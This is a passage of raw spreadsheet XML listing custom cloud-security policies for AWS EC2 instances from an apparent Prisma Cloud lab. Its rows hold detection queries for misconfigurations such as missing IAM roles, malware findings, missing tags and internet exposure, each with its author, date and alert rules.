          <t>attack_path</t>
        </is>
      </c>
      <c r="P1630" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1630" t="inlineStr"/>
      <c r="R1630" t="inlineStr"/>
      <c r="S1630" t="inlineStr"/>
      <c r="T1630" t="b">
        <v>0</v>
      </c>
      <c r="U1630" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1630" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1630" t="inlineStr"/>
      <c r="X1630" t="inlineStr"/>
      <c r="Y1630" t="inlineStr"/>
      <c r="Z1630" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name IN ('AWS EC2 Instance IAM Role not enabled')</t>
        </is>
      </c>
      <c r="AA1630" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1630" t="inlineStr">
        <is>
          <t>2024-09-13 16:55:02</t>
        </is>
      </c>
      <c r="AC1630" t="inlineStr"/>
      <c r="AD1630" t="b">
        <v>0</v>
      </c>
      <c r="AE1630" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1630" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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testrule - Notifications:, AccountGroups:test;, testrule2 - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,AWS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1630" t="inlineStr">
        <is>
          <t>19987247-4141-4e3d-86ea-0a33e93f0b0c</t>
        </is>
      </c>
      <c r="AI1630" t="inlineStr">
        <is>
          <t>0b09a38b-1706-4c10-b91d-c0048a1eef2e</t>
        </is>
      </c>
      <c r="AJ1630" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1630" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" t="inlineStr"/>
      <c r="B1631" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1631" s="2" t="inlineStr"/>
      <c r="D1631" t="inlineStr"/>
      <c r="E1631" t="inlineStr"/>
      <c r="F1631" t="inlineStr"/>
      <c r="G1631" t="b">
        <v>0</v>
      </c>
      <c r="H1631" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Default Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., Malware test, New Azure Subscription Created, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Ranti-Jira-Alert-rule, anomalies-avega, ar-vstoyko, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, jbrox-all-accounts-noDDoS-policy, mark davis test 412024, pagerduty-test, splunk-test, testrule, testrule2</t>
        </is>
      </c>
      <c r="I1631" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1631" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1631" t="inlineStr">
        <is>
          <t>EC2 instances with Malware</t>
        </is>
      </c>
      <c r="L1631" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1631" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1631" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1631" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1631" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1631" t="inlineStr"/>
      <c r="R1631" t="inlineStr"/>
      <c r="S1631" t="inlineStr"/>
      <c r="T1631" t="b">
        <v>0</v>
      </c>
      <c r="U1631" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1631" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1631" t="inlineStr"/>
      <c r="X1631" t="inlineStr">
        <is>
          <t>Remove malware files from EC2 instances</t>
        </is>
      </c>
      <c r="Y1631" t="inlineStr"/>
      <c r="Z1631" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name IN ('Host contains Malware','Host contains Grayware')</t>
        </is>
      </c>
      <c r="AA1631" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1631" t="inlineStr">
        <is>
          <t>2024-09-13 17:21:57</t>
        </is>
      </c>
      <c r="AC1631" t="inlineStr"/>
      <c r="AD1631" t="b">
        <v>0</v>
      </c>
      <c r="AE1631" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1631" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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Malware test - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,Compute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testrule - Notifications:, AccountGroups:test;, testrule2 - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,AWS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1631" t="inlineStr">
        <is>
          <t>13b65830-006f-4111-81bd-80ed05693025</t>
        </is>
      </c>
      <c r="AI1631" t="inlineStr">
        <is>
          <t>01228f26-ddf5-4192-b640-889fc2d95db6</t>
        </is>
      </c>
      <c r="AJ1631" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1631" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" t="inlineStr"/>
      <c r="B1632" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1632" s="2" t="inlineStr"/>
      <c r="D1632" t="inlineStr"/>
      <c r="E1632" t="inlineStr"/>
      <c r="F1632" t="inlineStr"/>
      <c r="G1632" t="b">
        <v>1</v>
      </c>
      <c r="H16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32" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1632" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1632" t="inlineStr">
        <is>
          <t>Test Attack Path Policy</t>
        </is>
      </c>
      <c r="L1632" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1632" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1632" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1632" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1632" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1632" t="inlineStr"/>
      <c r="R1632" t="inlineStr"/>
      <c r="S1632" t="inlineStr"/>
      <c r="T1632" t="b">
        <v>0</v>
      </c>
      <c r="U1632" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1632" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1632" t="inlineStr"/>
      <c r="X1632" t="inlineStr"/>
      <c r="Y1632" t="inlineStr"/>
      <c r="Z1632" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name IN ('Host contains Malware','Host contains Grayware')</t>
        </is>
      </c>
      <c r="AA1632" t="inlineStr">
        <is>
          <t>Jason Dempsey</t>
        </is>
      </c>
      <c r="AB1632" t="inlineStr">
        <is>
          <t>2024-09-24 18:53:58</t>
        </is>
      </c>
      <c r="AC1632" t="inlineStr"/>
      <c r="AD1632" t="b">
        <v>0</v>
      </c>
      <c r="AE1632" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1632" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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32" t="inlineStr">
        <is>
          <t>af7f3556-a585-4c7c-88d4-8e382a084d20</t>
        </is>
      </c>
      <c r="AI1632" t="inlineStr">
        <is>
          <t>01228f26-ddf5-4192-b640-889fc2d95db6</t>
        </is>
      </c>
      <c r="AJ1632" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1632" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" t="inlineStr"/>
      <c r="B1633" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1633" s="2" t="inlineStr"/>
      <c r="D1633" t="inlineStr"/>
      <c r="E1633" t="inlineStr"/>
      <c r="F1633" t="inlineStr"/>
      <c r="G1633" t="b">
        <v>0</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1633" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1633" t="inlineStr">
        <is>
          <t>AWS EC2 - 45 Days - Owned</t>
        </is>
      </c>
      <c r="L1633" t="inlineStr"/>
      <c r="M1633" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1633" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1633" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1633" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1633" t="inlineStr"/>
      <c r="R1633" t="inlineStr"/>
      <c r="S1633" t="inlineStr"/>
      <c r="T1633" t="b">
        <v>0</v>
      </c>
      <c r="U1633" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1633" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1633" t="inlineStr"/>
      <c r="X1633" t="inlineStr"/>
      <c r="Y1633" t="inlineStr"/>
      <c r="Z1633" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = "_DateTime.ageInDays(launchTime) &gt; 45" AND json.rule = tags contains "owner" addcolumn launchTime</t>
        </is>
      </c>
      <c r="AA1633" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1633" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1633" t="inlineStr"/>
      <c r="AD1633" t="b">
        <v>0</v>
      </c>
      <c r="AE1633" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1633" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>d22b4486-e4b5-4a80-8d70-1c95a23c0737</t>
        </is>
      </c>
      <c r="AI1633" t="inlineStr">
        <is>
          <t>c57b9378-0612-41b2-af67-76ee06f533ae</t>
        </is>
      </c>
      <c r="AJ1633" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1633" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" t="inlineStr"/>
      <c r="B1634" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1634" s="2" t="inlineStr"/>
      <c r="D1634" t="inlineStr"/>
      <c r="E1634" t="inlineStr"/>
      <c r="F1634" t="inlineStr"/>
      <c r="G1634" t="b">
        <v>0</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1634" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1634" t="inlineStr">
        <is>
          <t>AWS EC2 - 7 Days - No Owner</t>
        </is>
      </c>
      <c r="L1634" t="inlineStr"/>
      <c r="M1634" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1634" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1634" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1634" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1634" t="inlineStr"/>
      <c r="R1634" t="inlineStr"/>
      <c r="S1634" t="inlineStr"/>
      <c r="T1634" t="b">
        <v>0</v>
      </c>
      <c r="U1634" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1634" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1634" t="inlineStr">
        <is>
          <t>Detect AWS VM instances that are older than 7 days and are missing the 'owner' tag.</t>
        </is>
      </c>
      <c r="X1634" t="inlineStr"/>
      <c r="Y1634" t="inlineStr"/>
      <c r="Z1634" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(launchTime) &gt; 7 and tags.key does not equal owner and tags.value does not contain prismacloud-scan" addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1634" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1634" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1634" t="inlineStr"/>
      <c r="AD1634" t="b">
        <v>0</v>
      </c>
      <c r="AE1634" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1634" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>4ccdb387-826e-4224-baff-a842d58f196e</t>
        </is>
      </c>
      <c r="AI1634" t="inlineStr">
        <is>
          <t>027954fc-6c0b-4290-9cb5-c18048c9ae90</t>
        </is>
      </c>
      <c r="AJ1634" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1634" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" t="inlineStr"/>
      <c r="B1635" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1635" s="2" t="inlineStr"/>
      <c r="D1635" t="inlineStr"/>
      <c r="E1635" t="inlineStr"/>
      <c r="F1635" t="inlineStr"/>
      <c r="G1635" t="b">
        <v>1</v>
      </c>
      <c r="H16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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1635" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1635" t="inlineStr">
        <is>
          <t>Copy of Cloned: Cloned: Cloned elevance 4</t>
        </is>
      </c>
      <c r="L1635" t="inlineStr"/>
      <c r="M1635" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1635" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1635" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1635" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1635" t="inlineStr"/>
      <c r="R1635" t="inlineStr"/>
      <c r="S1635" t="inlineStr"/>
      <c r="T1635" t="b">
        <v>0</v>
      </c>
      <c r="U1635" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1635" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1635" t="inlineStr"/>
      <c r="X1635" t="inlineStr"/>
      <c r="Y1635" t="inlineStr"/>
      <c r="Z1635" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS EC2 Instance IAM Role not enabled' and 'AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)') and ('AWS EC2 with write permission on critical configuration for s3'))</t>
        </is>
      </c>
      <c r="AA1635" t="inlineStr">
        <is>
          <t>Bishvesh Pachauli</t>
        </is>
      </c>
      <c r="AB1635" t="inlineStr">
        <is>
          <t>2024-01-17 19:52:38</t>
        </is>
      </c>
      <c r="AC1635" t="inlineStr"/>
      <c r="AD1635" t="b">
        <v>0</v>
      </c>
      <c r="AE1635" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1635" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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5" t="inlineStr">
        <is>
          <t>3d9788d8-c357-4dfb-b5af-1e5fe8609ae0</t>
        </is>
      </c>
      <c r="AI1635" t="inlineStr">
        <is>
          <t>fcca6b7a-d79c-4503-bd87-e5aff915f04e</t>
        </is>
      </c>
      <c r="AJ1635" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1635" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" t="inlineStr">
        <is>
          <t>HIPAA</t>
        </is>
      </c>
      <c r="B1636" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1636" s="2" t="inlineStr"/>
      <c r="D1636" t="inlineStr"/>
      <c r="E1636" t="inlineStr"/>
      <c r="F1636" t="inlineStr"/>
      <c r="G1636" t="b">
        <v>0</v>
      </c>
      <c r="H16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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1636" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1636" t="inlineStr">
        <is>
          <t>test_policy_vstoyko_1</t>
        </is>
      </c>
      <c r="L1636" t="inlineStr"/>
      <c r="M1636" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1636" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1636" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1636" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1636" t="inlineStr">
        <is>
          <t>164.312(c)</t>
        </is>
      </c>
      <c r="R1636" t="inlineStr">
        <is>
          <t>164.312(c)(2)</t>
        </is>
      </c>
      <c r="S1636" t="inlineStr">
        <is>
          <t>new_label,vstoyko : test</t>
        </is>
      </c>
      <c r="T1636" t="b">
        <v>0</v>
      </c>
      <c r="U1636" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1636" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1636" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1636" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1636" t="inlineStr"/>
      <c r="Z1636" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1636" t="inlineStr">
        <is>
          <t>Vitaliy Stoyko</t>
        </is>
      </c>
      <c r="AB1636" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1636" t="inlineStr"/>
      <c r="AD1636" t="b">
        <v>0</v>
      </c>
      <c r="AE1636" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1636" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>ec999a25-96b4-4f5f-92a1-6ff7018b79de</t>
        </is>
      </c>
      <c r="AI1636" t="inlineStr">
        <is>
          <t>16588b52-36ec-47c8-8c23-907b2a8aeae6</t>
        </is>
      </c>
      <c r="AJ1636" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1636" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" t="inlineStr"/>
      <c r="B1637" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1637" s="2" t="inlineStr"/>
      <c r="D1637" t="inlineStr"/>
      <c r="E1637" t="inlineStr"/>
      <c r="F1637" t="inlineStr"/>
      <c r="G1637" t="b">
        <v>0</v>
      </c>
      <c r="H16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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1637" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1637" t="inlineStr">
        <is>
          <t>Adams SNOW EC2 CC</t>
        </is>
      </c>
      <c r="L1637" t="inlineStr"/>
      <c r="M1637" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1637" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1637" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1637" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1637" t="inlineStr"/>
      <c r="R1637" t="inlineStr"/>
      <c r="S1637" t="inlineStr">
        <is>
          <t>DONTREMOVEME,Autoreplaced</t>
        </is>
      </c>
      <c r="T1637" t="b">
        <v>0</v>
      </c>
      <c r="U1637" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1637" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1637" t="inlineStr">
        <is>
          <t>Detect AWS VM instances that are older than 7 days and are missing the 'owner' tag.</t>
        </is>
      </c>
      <c r="X1637" t="inlineStr"/>
      <c r="Y1637" t="inlineStr"/>
      <c r="Z1637" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(launchTime) &gt; 7" AND json.rule = tags does not contain "owner" addcolumn launchTime</t>
        </is>
      </c>
      <c r="AA1637" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1637" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1637" t="inlineStr"/>
      <c r="AD1637" t="b">
        <v>0</v>
      </c>
      <c r="AE1637" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1637" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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7" t="inlineStr">
        <is>
          <t>f5f476d1-dcea-4728-a7e4-aad70f840aea</t>
        </is>
      </c>
      <c r="AI1637" t="inlineStr">
        <is>
          <t>4a752761-a3fb-43f9-ad44-6b2d4581e157</t>
        </is>
      </c>
      <c r="AJ1637" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1637" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (GKE)</t>
        </is>
      </c>
      <c r="B1638" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1638" s="2" t="inlineStr"/>
      <c r="D1638" t="inlineStr"/>
      <c r="E1638" t="inlineStr"/>
      <c r="F1638" t="inlineStr"/>
      <c r="G1638" t="b">
        <v>0</v>
      </c>
      <c r="H16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autoremediation alert rule,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38" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1638" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1638" t="inlineStr">
        <is>
          <t>appid tag exists</t>
        </is>
      </c>
      <c r="L1638" t="inlineStr"/>
      <c r="M1638" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1638" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1638" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1638" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1638" t="inlineStr">
        <is>
          <t>Worker Nodes</t>
        </is>
      </c>
      <c r="R1638" t="inlineStr">
        <is>
          <t>3.1.1</t>
        </is>
      </c>
      <c r="S1638" t="inlineStr"/>
      <c r="T1638" t="b">
        <v>1</v>
      </c>
      <c r="U1638" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1638" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1638" t="inlineStr"/>
      <c r="X1638" t="inlineStr">
        <is>
          <t>aws ec2 describe-tags --filters "Name=resource-id,Values=${resourceId}" "Name=key,Values=AppID" --region=us-east-1</t>
        </is>
      </c>
      <c r="Y1638" t="inlineStr">
        <is>
          <t>'description': '',
'cliScriptTemplate': 'aws ec2 create-tags --region $region --resources $resourceId --tags "Key=master-portfolio,Value=needs update" "Key=application-owner,Value=needs update" "Key=support-group,Value=needs update" "Key=humana-resource-id,Value=needs update" "Key=application-name,Value=needs update" "Key=environment,
Value=needs update" "Key=privacy-level,Value=needs update"  "Key=AppID,Value=needs update" '</t>
        </is>
      </c>
      <c r="Z1638" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = tags[*].key does not contain "AppID"</t>
        </is>
      </c>
      <c r="AA1638" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1638" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1638" t="inlineStr"/>
      <c r="AD1638" t="b">
        <v>0</v>
      </c>
      <c r="AE1638" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1638" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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autoremediation alert rule - Notifications:, AccountGroups:manish account group;,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38" t="inlineStr">
        <is>
          <t>91018724-778d-4722-b1be-cddccee57fb1</t>
        </is>
      </c>
      <c r="AI1638" t="inlineStr">
        <is>
          <t>d483b9c9-4bf6-45bf-b4ac-3fdc1ee07d8e</t>
        </is>
      </c>
      <c r="AJ1638" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1638" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" t="inlineStr"/>
      <c r="B1639" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1639" s="2" t="inlineStr"/>
      <c r="D1639" t="n">
        <v>1</v>
      </c>
      <c r="E1639" t="n">
        <v>0</v>
      </c>
      <c r="F1639" t="n">
        <v>0</v>
      </c>
      <c r="G1639" t="b">
        <v>1</v>
      </c>
      <c r="H16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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1639" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1639" t="inlineStr">
        <is>
          <t>dmensah-shi-test-Must-scan-second</t>
        </is>
      </c>
      <c r="L1639" t="inlineStr"/>
      <c r="M1639" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1639" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1639" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1639" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1639" t="inlineStr"/>
      <c r="R1639" t="inlineStr"/>
      <c r="S1639" t="inlineStr"/>
      <c r="T1639" t="b">
        <v>0</v>
      </c>
      <c r="U1639" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1639" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1639" t="inlineStr"/>
      <c r="X1639" t="inlineStr"/>
      <c r="Y1639" t="inlineStr"/>
      <c r="Z1639" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'dmensah-shi-test1' AND api.name = 'aws-ec2-describe-instances' AND json.rule = tags[?(@.key=='shi-must-scan' &amp;&amp; @.value=='')].key exists</t>
        </is>
      </c>
      <c r="AA1639" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1639" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1639" t="inlineStr"/>
      <c r="AD1639" t="b">
        <v>0</v>
      </c>
      <c r="AE1639" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1639" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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39" t="inlineStr">
        <is>
          <t>a97f2937-a620-439e-80c5-de2aeabd9138</t>
        </is>
      </c>
      <c r="AI1639" t="inlineStr">
        <is>
          <t>8fae2a10-8712-41a9-9939-c125282be2ed</t>
        </is>
      </c>
      <c r="AJ1639" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1639" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" t="inlineStr"/>
      <c r="B1640" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1640" s="2" t="inlineStr"/>
